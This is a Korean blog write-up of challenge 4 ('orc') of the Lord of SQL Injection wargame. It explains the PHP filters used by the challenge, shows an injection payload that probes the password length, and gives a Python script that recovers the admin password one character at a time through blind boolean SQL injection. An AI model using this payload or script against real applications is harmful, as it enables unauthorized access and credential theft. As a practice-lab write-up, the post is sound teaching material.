쉽고 깔끔하게
[LOS ; Lord of SQL Injection] 4번 orc 문제풀이 본문
728x90
반응형
문제
https://los.rubiya.kr/chall/orc_60e5b360f95c1f9688e4f3a86c5dd494.php
풀이
- preg_match($pattern, $subject, [, $matches]) : 문자열 안에서 특정한 정규식 패턴의 존재 여부를 찾는데 유용한 함수
- $pattern : 문자열로 검색할 패턴
- $subject : 입력 문자열
- [$matches] : 사용 시 패턴에 매치되는 내용을 배열에 담아둠
따라서 얻을 수 있는 정보로는 pw의 입력 값 필터링 규칙으로 다음과 같은 정보를 필터링한다는 것이다.
1) prob
2) _
3) .
4) ( )
- addslashes() : DB의 질의에서 처리할 필요가 있는 문자 앞에 백슬래시(\)를 붙인 문자열 반환, 이때 처리할 필요가 있는 문자에는 싱글 쿼터('), 더블 쿼터("), 백슬래시(\), NUL(NULL)이 있다.
ex) It's a pen --오류 발생--> It\'s a pen
해당 문제를 해결하기 위해서는 admin 계정의 정확한 PW를 입력해야만 한다.
PW를 알아내기 위해 가장 먼저 length()를 이용하여 pw의 길이를 알아보았다.
pw=' || length(pw)=8%23을 입력했을 때 'Hello admin'이 출력된 것을 보아 pw의 길이가 8이라는 것을 알 수 있다.
pw의 길이를 알아냈기 때문에 실제 pw의 값을 알아내기 위해서는 0~9, A~Z, a~z를 하나씩 대입하여 'Hello admin'이 출력되는 값이 참값이라는 방법을 사용할 수 있지만, 이는 오랜 시간이 걸리기 때문에 파이썬 코드를 통해 pw를 알아내고자 한다.
import requests
password = ''
for admin_len in range(8): #pw의 길이 8만큼 수행
for admin_pass in range(ord('0'), ord('z')): #숫자 0에서 부터 문자 z까지 대입
URL = 'https://los.rubiya.kr/chall/orc_60e5b360f95c1f9688e4f3a86c5dd494.php'
query = {'pw' : '\' or substr(pw, 1, ' + str(admin_len + 1) +')=\'' + password + chr(admin_pass) + '\'#'}
cookies = {'PHPSESSID' : '쿠키 정보'} #쿠키 정보에 각자의 쿠키 값을 대입
res = requests.get(URL, params = query, cookies = cookies)
if('Hello admin' in res.text): #만약에 res.text에 Hello admin이 뜨면 pw 출력
password = password + chr(admin_pass)
print('Password detected (' + str(admin_len + 1) + ' words): ' + password)
break
이로써 실제 pw의 값이 095A9852라는 것을 알아낼 수 있었다.
MySQL은 대문자와 소문자를 구분하지 않아 대문자 A와 소문자 a 모두 참의 결과를 보여준다.
따라서 소문자 a로 바꾼 pw=095a9852를 대입하면 문제를 해결할 수 있다.
728x90
반응형
'WebHacking > LOS' 카테고리의 다른 글
[LOS ; Lord of SQL Injection] 6번 darkelf 문제풀이 (0) | 2022.03.16 |
---|---|
[LOS ; Lord of SQL Injection] 5번 wolfman 문제풀이 (0) | 2022.03.15 |
[LOS ; Lord of SQL Injection] 3번 goblin 문제풀이 (0) | 2022.03.11 |
[LOS ; Lord of SQL Injection] 2번 cobolt 문제풀이 (0) | 2022.03.10 |
[LOS ; Lord of SQL Injection] 1번 gremlin 문제풀이 (0) | 2022.03.10 |